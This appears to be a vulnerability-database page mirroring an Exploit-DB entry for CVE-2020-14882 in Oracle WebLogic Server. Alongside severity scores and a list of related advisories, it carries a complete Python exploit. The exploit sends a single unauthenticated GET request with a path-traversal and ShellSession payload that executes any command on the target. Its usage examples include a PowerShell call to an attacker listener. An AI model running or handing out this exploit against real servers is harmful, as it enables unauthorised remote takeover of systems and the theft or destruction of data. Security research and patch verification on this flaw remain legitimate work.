Lucene search
Mohammed AlthibyaniEDB-ID:48971HistoryOct 29, 2020 - 12:00 a.m.
WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request
2020-10-2900:00:00
Mohammed Althibyani
www.exploit-db.com
1515
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
100.0%
#!/usr/bin/python3
# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request
# Exploit Author: Nguyen Jang
# CVE: CVE-2020-14882
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
if len(sys.argv) != 3:
print("[+] WebLogic Unauthenticated RCE via GET request")
print("[+] Usage : python3 exploit.py http(s)://target:7001 command")
print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")
print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")
exit()
target = sys.argv[1]
command = sys.argv[2]
request = requests.session()
headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}
print("[+] Sending GET Request ....")
GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)
print("[+] Done !!")Related
githubexploit
githubexploit
Exploit for CVE-2020-14882
2021-05-10 21:32:36
Exploit for CVE-2020-14882
2020-11-01 13:12:27
Exploit for CVE-2020-14882
2021-02-25 12:57:08
nessus
nessus
Oracle WebLogic Server RCE (CVE-2020-14882)
2020-11-06 00:00:00
Oracle WebLogic Server Multiple Vulnerabilities (Oct 2020 CPU)
2020-10-22 00:00:00
metasploit
metasploit
Oracle WebLogic Server Administration Console Handle RCE
2020-11-18 16:56:02
cve
cve
CVE-2020-14882
2020-10-21 15:15:00
impervablog
impervablog
Bug hunting for a quick buck using WebLogic vulnerability (CVE-2020–14882)
2020-11-02 15:47:04
Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers
2021-09-13 14:57:52
Imperva Detects Undocumented 8220 Gang Activities
2023-12-14 13:48:35
trendmicroblog
trendmicroblog
packetstorm
packetstorm
Oracle WebLogic Server 12.2.1.0 Remote Code Execution
2021-01-26 00:00:00
Oracle WebLogic Server Remote Code Execution
2020-10-29 00:00:00
Oracle WebLogic Server Administration Console Handle Remote Code Execution
2020-11-19 00:00:00
malwarebytes
malwarebytes
A week in security (October 26 – November 1)
2020-11-02 17:46:12
prion
prion
Design/Logic Flaw
2020-10-21 15:15:00
nuclei
nuclei
Oracle Weblogic Server - Remote Command Execution
2020-10-29 12:58:49
Oracle WebLogic Server - Remote Command Execution
2021-04-23 12:39:54
kitploit
kitploit
Melody - A Transparent Internet Sensor Built For Threat Intelligence
2022-04-13 12:30:00
Vulmap - Web Vulnerability Scanning And Verification Tools
2020-12-25 11:30:00
exploitdb
exploitdb
Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)
2021-01-26 00:00:00
thn
thn
Multiple Botnets Exploiting Critical Oracle WebLogic Bug — PATCH NOW
2020-12-02 09:20:00
Cybercriminals Targeting Apache NiFi Instances for Cryptocurrency Mining
2023-05-31 15:44:00
cisa_kev
cisa_kev
Oracle WebLogic Server Remote Code Execution Vulnerability
2021-11-03 00:00:00
Oracle WebLogic Server Remote Code Execution Vulnerability
2021-11-03 00:00:00
threatpost
threatpost
Golang Cryptomining Worm Offers 15% Speed Boost
2021-08-06 20:41:40
WordPress Patches 3-Year-Old High-Severity RCE Bug
2020-10-30 20:56:19
Oracle WebLogic Server RCE Flaw Under Active Attack
2020-10-29 14:49:58
rapid7blog
rapid7blog
attackerkb
attackerkb
CVE-2020-14750 — Oracle WebLogic Remote Unauthenticated Remote Code Execution (RCE) Vulnerability
2020-11-02 00:00:00
CVE-2020-2555
2020-01-15 00:00:00
zdt
zdt
checkpoint_advisories
checkpoint_advisories
qualysblog
qualysblog
Why Is Snapshot Scanning Not Enough?
2022-11-01 13:27:50
Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines
2022-02-26 20:20:32
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
ics
ics
Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure
2022-03-01 12:00:00
2022 Top Routinely Exploited Vulnerabilities
2023-08-03 12:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - October 2020
2020-10-20 00:00:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
100.0%
Related for EDB-ID:48971